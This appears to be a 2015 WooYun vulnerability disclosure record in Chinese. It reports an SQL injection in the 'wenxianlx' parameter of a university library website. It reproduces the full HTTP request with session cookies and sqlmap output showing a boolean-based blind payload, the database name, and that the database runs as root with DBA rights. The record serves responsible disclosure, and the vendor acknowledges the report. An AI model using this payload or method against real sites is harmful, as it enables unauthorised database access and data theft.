乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-23: 细节已通知厂商并且等待厂商处理中 2015-11-23: 厂商已经确认,细节仅向厂商公开 2015-12-03: 细节向核心白帽子及相关领域专家公开 2015-12-13: 细节向普通白帽子公开 2015-12-23: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
RT
GET /plus/list.php?page=2&tid=69&wenxianlx= HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://library.upc.edu.cnCookie: safedog-flow-item=FBBE77FDEBD8B0A43B868DAFC74C71D0; PHPSESSID=aqgq2glp7u4h00887f7c9rc387; %D6%D0%B9%FA%CA%AF%D3%CD%B4%F3%D1%A7%B9%AB%CE%C4%C7%A9%CA%D5%CF%B5%CD%B3=ViewUrl=admin%5Findex%2Easp&shenhe=®level=&fullname=&KEY=&purview=&UserName=; ASPSESSIONIDQCCTASBD=AALJIFDCNMGNKDDFNLHFJGAJ; OrdersId=AFBXL1UBVjFQM1RvAjsFb1VjVW0JYlFlVGtXUQ0VAD1VYAJm; CNZZDATA1000490494=983320778-1447851033-http%253A%252F%252Fwww.acunetix-referrer.com%252F%7C1447851033; safedog-flow-item=FBBE77FDEBD8B0A43B868DAFC74C71D0Host: library.upc.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
wenxianlx参数存在注入
sqlmap resumed the following injection point(s) from stored session:---Parameter: wenxianlx (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: page=2&tid=69&wenxianlx=-5746') OR 8493=8493 AND ('TVbi' LIKE 'TVbi---back-end DBMS: MySQL 5available databases [1]:[*] sydxtsg
sqlmap resumed the following injection point(s) from stored session:---Parameter: wenxianlx (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: page=2&tid=69&wenxianlx=-5746') OR 8493=8493 AND ('TVbi' LIKE 'TVbi---back-end DBMS: MySQL 5current user: 'root@localhost'current user is DBA: True
危害等级:中
漏洞Rank:8
确认时间:2015-11-23 13:37
感谢您对学校的网络安全的关注,我们会尽快解决该问题。
暂无